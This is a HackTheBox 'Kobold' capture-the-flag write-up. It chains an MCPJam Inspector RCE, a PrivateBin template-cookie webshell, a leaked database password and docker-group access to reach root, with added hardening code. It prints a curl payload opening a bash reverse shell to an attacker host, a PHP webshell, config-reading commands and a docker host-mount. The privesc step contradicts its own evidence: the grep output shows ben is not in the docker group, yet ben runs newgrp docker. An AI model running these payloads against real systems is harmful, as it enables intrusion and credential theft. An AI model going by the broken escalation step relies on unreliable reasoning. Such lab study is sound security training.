# Kobold

<figure><img src="/files/HHv3YjZU68M9DO7oCFAB" alt=""><figcaption></figcaption></figure>

## HTB — Kobold Writeup

### Reconnaissance

#### Nmap

The scan revealed three open ports on the target:

* **22/tcp** — OpenSSH 9.6p1 (Ubuntu)
* **80/tcp** — nginx 1.24.0 (redirects to HTTPS)
* **443/tcp** — nginx 1.24.0, TLS certificate for `kobold.htb` and `*.kobold.htb`

The wildcard in the certificate points at name-based virtual hosts, so the hostnames found below were added to `/etc/hosts`:

```
<MACHINE_IP> kobold.htb mcp.kobold.htb bin.kobold.htb
```

#### VHost Fuzzing

```bash
# Fuzz the Host header for vhosts behind the *.kobold.htb certificate.
# Once the size/code of the catch-all response is known, add -fs <size> or
# -fc <code> so only the real vhosts remain in the output.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
  -u https://kobold.htb/ -H "Host: FUZZ.kobold.htb"
```

Discovered two subdomains:

* `mcp.kobold.htb` — MCPJam Inspector
* `bin.kobold.htb` — PrivateBin 2.0.2

***

### Initial Foothold — RCE via MCPJam Inspector (CVE-2026-23744)

MCPJam Inspector up to and including version 1.4.2 is vulnerable to unauthenticated RCE. The `/api/mcp/connect` endpoint exists to launch stdio MCP servers: it spawns whatever `command` and `args` the JSON `serverConfig` names, and it does so without any authentication, so anyone who can reach the inspector can ask it to start a shell as the service user.

**Listener:**

```bash
rlwrap nc -lvnp 4444
```

**Exploit:**

```bash
# --data makes curl send a POST; the server spawns command+args exactly as given.
curl -sk https://mcp.kobold.htb/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data '{"serverConfig":{"command":"/bin/bash","args":["-c","bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"],"env":{}},"serverId":"test"}'
```

Shell received as user `ben`.
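To make the bug concrete, here is an added example (not MCPJam's own code) that models the `connect` handler in Python: `connect_vulnerable` spawns whatever the request names, which is the pattern behind the RCE, and `vet_connect_request` / `connect_hardened` add the two controls it lacks, a bearer token and an allowlist of bare launcher names resolved on `PATH`. The function names, `ALLOWED_SERVERS`, `API_TOKEN` and the allowlist contents are illustrative assumptions, not the project's actual fix.

```python
"""Vulnerable vs hardened "connect" handler in the style of MCPJam's
/api/mcp/connect. Added example for this writeup; not MCPJam's code. The
names (connect_vulnerable, vet_connect_request, connect_hardened,
ALLOWED_SERVERS, API_TOKEN) and the allowlist contents are assumptions."""
import hmac
import os
import shutil
import subprocess
from typing import List, Optional

# Assumed operator-approved launchers for stdio MCP servers (illustrative).
ALLOWED_SERVERS = {"npx", "uvx"}
# Assumed per-install secret that the inspector UI would send as a bearer token.
API_TOKEN = "replace-with-a-random-per-install-secret"


def connect_vulnerable(body: dict) -> str:
    """The pattern behind the RCE: spawn whatever command/args the JSON names.

    No authentication and no restriction on the binary, so a body such as
    {"serverConfig": {"command": "/bin/bash", "args": ["-c", "..."]}}
    runs arbitrary shell as the service user. Returns the child's stdout.
    """
    cfg = body["serverConfig"]
    proc = subprocess.run(
        [cfg["command"], *cfg.get("args", [])],
        capture_output=True, text=True, timeout=10,
        env={**os.environ, **cfg.get("env", {})},
    )
    return proc.stdout


def vet_connect_request(body: dict, authorization: Optional[str]) -> List[str]:
    """Controls the vulnerable handler lacks; returns the argv it may spawn.

    Raises PermissionError on a missing or wrong token and ValueError on a
    command that is not a bare name from ALLOWED_SERVERS found on PATH.
    """
    if not authorization or not authorization.startswith("Bearer "):
        raise PermissionError("missing bearer token")
    if not hmac.compare_digest(authorization[len("Bearer "):], API_TOKEN):
        raise PermissionError("bad token")
    cfg = body.get("serverConfig", {})
    command = cfg.get("command", "")
    # Bare names only: "/bin/bash", "../x" and "" all fail this check.
    if not command or os.path.basename(command) != command:
        raise ValueError(f"command must be a bare name: {command!r}")
    if command not in ALLOWED_SERVERS:
        raise ValueError(f"command not on allowlist: {command!r}")
    resolved = shutil.which(command)
    if resolved is None:
        raise ValueError(f"{command} not found on PATH")
    args = cfg.get("args", [])
    if not all(isinstance(a, str) for a in args):
        raise ValueError("args must be strings")
    return [resolved, *args]


def connect_hardened(body: dict, authorization: Optional[str]) -> str:
    """Spawn only what vet_connect_request approved; never through a shell."""
    argv = vet_connect_request(body, authorization)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return proc.stdout


if __name__ == "__main__":
    payload = {"serverConfig": {"command": "/bin/sh", "args": ["-c", "id"],
                                "env": {}}, "serverId": "test"}
    print("vulnerable handler ran:", connect_vulnerable(payload).strip())
    try:
        connect_hardened(payload, None)
    except PermissionError as e:
        print("hardened handler refused:", e)
```

Binding the node process to `127.0.0.1:6274`, as this box does, is not a control on its own: nginx proxies `mcp.kobold.htb` straight to it, so the endpoint still needs its own authentication.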

***

### Internal Recon

```bash
ss -tlnp
```

Notable internal ports:

* `127.0.0.1:6274` — MCPJam node process
* `127.0.0.1:8080` — internal service
* `*:3552` — exposed on all interfaces (PrivateBin container)

***

### PrivateBin LFI/RCE (bin.kobold.htb)

#### Discovery

`bin.kobold.htb` runs PrivateBin 2.0.2. This version lets the client choose the template to render through a `template` cookie, and the cookie value is used to build the path of the PHP template file that gets included without `../` being rejected. Any `.php` file on a path reachable from the template directory can therefore be included, which turns a file write into code execution (the issue is covered by an advisory published on privatebin.info).

#### Writing a Webshell

From the `ben` shell on the host, the directory backing the PrivateBin container's data volume was writable, so a PHP webshell could be dropped beside the paste data:

```bash
# Host-side path of the container's data volume; inside the container this
# is the data/ directory that sits next to tpl/ under the web root.
echo '<?php system($_GET["cmd"]); ?>' > /privatebin-data/data/shell.php
```

#### Triggering RCE via Template Cookie

PrivateBin appends `.php` to the cookie value and includes the result, so `template=../data/shell` resolves to `tpl/../data/shell.php`, the file written above. The command reaches the webshell through the `cmd` query parameter:

```bash
curl -sk "https://bin.kobold.htb/?cmd=id" -H "Cookie: template=../data/shell"
```
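The following is an added example, not PrivateBin's code, that models the template lookup in Python so the traversal and its fix can be checked side by side: `template_path_unchecked` reproduces the `tpl/<cookie>.php` lookup that lets `../data/shell` escape, and `template_path_checked` adds an allowlist plus a containment check. `PUBLIC_PATH`, `KNOWN_TEMPLATES` and the function names are illustrative assumptions, and the check shown is one way to close the hole rather than necessarily the project's own patch.

```python
"""Template selection by cookie: the traversal behind the PrivateBin webshell
trigger, beside a contained lookup. Added example for this writeup, not
PrivateBin's code; PUBLIC_PATH, KNOWN_TEMPLATES and the function names are
illustrative assumptions."""
import os
from typing import Optional

# Assumed web root and template set (illustrative; mirrors the PrivateBin
# layout of tpl/<name>.php with a data/ directory next to tpl/).
PUBLIC_PATH = "/var/www"
KNOWN_TEMPLATES = {"bootstrap5", "bootstrap", "bootstrap-dark"}
TPL_DIR = os.path.normpath(os.path.join(PUBLIC_PATH, "tpl"))


def template_path_unchecked(cookie: Optional[str],
                            default: str = "bootstrap5") -> str:
    """Vulnerable resolution: tpl/<cookie>.php with no validation at all.

    '../data/shell' becomes /var/www/tpl/../data/shell.php, i.e. a file the
    attacker wrote into the data directory, which PHP then include()s.
    """
    name = cookie if cookie else default
    return os.path.normpath(os.path.join(TPL_DIR, name + ".php"))


def contained_in_tpl(path: str) -> bool:
    """True only if the (normalised) path stays inside the template dir.

    Uses string normalisation only; a production check should realpath()
    both sides so symlinks cannot point a "contained" path elsewhere.
    """
    return os.path.commonpath([TPL_DIR, os.path.normpath(path)]) == TPL_DIR


def template_path_checked(cookie: Optional[str],
                          default: str = "bootstrap5") -> str:
    """Same lookup with two independent checks: allowlist and containment."""
    name = cookie if cookie else default
    if name not in KNOWN_TEMPLATES:
        raise ValueError(f"unknown template {name!r}")
    path = os.path.normpath(os.path.join(TPL_DIR, name + ".php"))
    # Belt and braces: even with a misconfigured allowlist the resolved
    # file must still live under tpl/.
    if not contained_in_tpl(path):
        raise ValueError(f"template escapes tpl/: {path}")
    return path


if __name__ == "__main__":
    evil = "../data/shell"
    print("unchecked:", template_path_unchecked(evil))   # /var/www/data/shell.php
    print("contained:", contained_in_tpl(template_path_unchecked(evil)))
    try:
        template_path_checked(evil)
    except ValueError as e:
        print("checked refused:", e)
```

The containment check alone would already have stopped this exploit, which is why it is kept even though the allowlist makes it look redundant: the allowlist protects against traversal, the containment check protects against a future template name that itself contains a path.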

#### Reading PrivateBin Config

The webshell runs inside the PrivateBin container as the PHP-FPM user, which is enough to read the application config:

```bash
# '+' in the query string decodes to a space before reaching system().
curl -sk "https://bin.kobold.htb/?cmd=ls+/srv/cfg/" -H "Cookie: template=../data/shell"
curl -sk "https://bin.kobold.htb/?cmd=cat+/srv/cfg/conf.php" -H "Cookie: template=../data/shell"
```

**Credentials found:**

```ini
[model_options]
dsn = "mysql:host=localhost;dbname=privatebin;charset=UTF8"
usr = "privatebin"
pwd = "ComplexP@sswordAdmin1928"
```

***

### Privilege Escalation

#### Credential Reuse

The database password was also accepted as the login for the service listening on port 3552 (not needed for the root path below):

```
user: arcane
pass: ComplexP@sswordAdmin1928
```

#### Docker Group Escalation

Checked group memberships straight from `/etc/group` rather than trusting `id`:

```bash
grep ben /etc/group
# operator:x:37:ben,alice
# ben:x:1001:

grep alice /etc/group
# docker:x:111:alice
```

Note: `id` in the reverse shell did not list `docker`. A process carries the supplementary groups it was given when it was created, and this shell inherited them from the MCPJam service that spawned it, so a membership granted in `/etc/group` after the service started never shows up until a fresh login. `newgrp` consults `/etc/group` afresh and starts a new shell with the requested group active; without a password this works only if the user is listed as a member of that group (or the group carries a password in `/etc/gshadow`).

```bash
newgrp docker
# `id` in the new shell should now include docker
```
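Comparing the group file against the live process credentials is the check that finds this kind of hidden privilege, so here is an added example (not a tool from the box) that does it in Python: `parse_group_file` reads `/etc/group` syntax, `hidden_groups` lists the groups granted to a user whose gid is missing from the session, and `hidden_groups_for_current_process` runs the same comparison against the real `/etc/group` and `os.getgroups()`. The sample group file is constructed here and is not Kobold's actual `/etc/group`; the function names are assumptions.

```python
"""Groups granted in /etc/group that the current process does not carry.
Added example for this writeup (not a tool from the box); the sample group
file below is constructed and is not Kobold's real /etc/group."""
import os
import pwd
from typing import Dict, Iterable, List, Set, Tuple

# Constructed sample in /etc/group format (not the box's actual file).
SAMPLE_GROUP_FILE = """\
root:x:0:
docker:x:111:alice,ben
operator:x:37:ben,alice
ben:x:1001:
alice:x:1002:
"""


def parse_group_file(text: str) -> Dict[str, Tuple[int, Set[str]]]:
    """Map group name -> (gid, set of member names) from /etc/group text."""
    groups: Dict[str, Tuple[int, Set[str]]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def granted_groups(user: str, groups: Dict[str, Tuple[int, Set[str]]]) -> Set[str]:
    """Supplementary groups /etc/group grants to `user` via its member list."""
    return {name for name, (_gid, members) in groups.items() if user in members}


def hidden_groups(user: str, groups: Dict[str, Tuple[int, Set[str]]],
                  session_gids: Iterable[int]) -> List[str]:
    """Groups granted in /etc/group whose gid is absent from the session.

    Each of these can be activated with `newgrp <name>` (or `sg`), which
    reads /etc/group afresh instead of the stale set the process inherited.
    """
    have = set(session_gids)
    return sorted(name for name in granted_groups(user, groups)
                  if groups[name][0] not in have)


def hidden_groups_for_current_process(path: str = "/etc/group") -> List[str]:
    """Live version: compare the real group file with os.getgroups()."""
    with open(path) as fh:
        groups = parse_group_file(fh.read())
    user = pwd.getpwuid(os.getuid()).pw_name
    return hidden_groups(user, groups, os.getgroups())


if __name__ == "__main__":
    groups = parse_group_file(SAMPLE_GROUP_FILE)
    # A shell spawned by a long-running service carries only the groups the
    # service had at start: here operator (37) and ben's own gid, not docker.
    print(hidden_groups("ben", groups, [1001, 37]))   # ['docker']
    print(hidden_groups_for_current_process())
```

Run the live function from any foothold shell; a non-empty result is a `newgrp` target worth trying before looking further for a privilege escalation vector.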

#### Root Flag

```bash
# Any docker-group member can mount the host root into a container and read
# it as root; --entrypoint cat keeps this to a single file read of the flag.
docker run -v /:/hostfs --rm --user root --entrypoint cat \
  privatebin/nginx-fpm-alpine:2.0.2 /hostfs/root/root.txt
```

Root flag retrieved. ✓

***

### Summary

| Step           | Technique                                         |
| -------------- | ------------------------------------------------- |
| Initial access | CVE-2026-23744 — MCPJam unauthenticated RCE       |
| Lateral        | PrivateBin template injection webshell            |
| Creds          | Plaintext DB password in conf.php                 |
| Privesc        | Docker group via `newgrp` + host filesystem mount |

***

*Machine: Kobold — HackTheBox*
